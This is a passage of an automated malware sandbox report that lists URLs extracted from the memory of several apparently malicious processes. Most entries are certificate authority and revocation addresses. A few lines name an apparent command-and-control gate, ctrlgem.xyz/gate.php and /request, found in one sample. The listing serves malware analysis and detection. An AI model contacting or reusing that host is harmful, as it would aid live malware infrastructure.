trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585164780.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1586024618.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, 
trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                      Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1719891520.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1816650813.000001E16B9EC000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16B9B5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832695924.000001E16B9ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
                                      Source: trano1221.exe, 0000002A.00000003.1816650813.000001E16B9EC000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1717851242.000001E16BA15000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16B9B5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880697620.000001E16B9F4000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1717851242.000001E16BA6C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832695924.000001E16B9ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577916/
                                      Source: trano1221.exe, 0000002A.00000003.1882675982.000001E16BAC9000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1884657596.000001E16C664000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1865956482.000001E16C661000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1885930845.000001E16BAC9000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1840930520.000001E16C65D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832985559.000001E16BAAE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1857007046.000001E16C65D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1838314051.000001E16C64F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1839236500.000001E16B56B000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1882867348.000001E16B56C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1828305886.000001E16BA84000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1813939975.000001E16B562000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1893387743.000001E16B56C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1946084154.000001E16BA86000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1816159571.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1942451950.000001E16B56C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                                      Source: trano1221.exe, 0000002A.00000002.1946800540.000001E16BB42000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1836411260.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1889974336.000001E16BA70000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1895673208.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1816159571.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
                                      Source: trano1221.exe, 0000002A.00000002.1946800540.000001E16BB42000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1895673208.000001E16BB41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crlk
                                      Source: trano1221.exe, 0000002A.00000003.1882675982.000001E16BAC9000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1884657596.000001E16C664000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1865956482.000001E16C661000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1885930845.000001E16BAC9000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1840930520.000001E16C65D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832985559.000001E16BAAE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1857007046.000001E16C65D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1838314051.000001E16C64F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
                                      Source: trano1221.exe, 0000002A.00000003.1882675982.000001E16BAC9000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1885930845.000001E16BAC9000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832985559.000001E16BAAE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crlf
                                      Source: powershell.exe, 00000019.00000002.1608019459.0000000007023000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.securetrust.com/SGCA.crl
                                      Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1857506490.000001E16BB09000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806059046.000001E16BAE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.securetrust.com/STCA.crl
                                      Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1857506490.000001E16BB09000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806059046.000001E16BAE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.securetrust.com/STCA.crl0
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
                                      Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1828305886.000001E16BA84000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1946084154.000001E16BA86000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1816159571.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1586024618.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585164780.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585164780.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                      Source: trano1221.exe, 00000023.00000003.1586024618.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585164780.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctrlgem.xyz/gate.php
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctrlgem.xyz/gate.phpMN
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctrlgem.xyz/request
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctrlgem.xyz/request-N
                                      Source: trano1221.exe, 0000002A.00000002.1950520854.000001E16C380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
                                      Source: trano1221.exe, 0000002A.00000003.1779310228.000001E16BBEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com
                                      Source: trano1221.exe, 0000002A.00000003.1804418435.000001E16B9B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
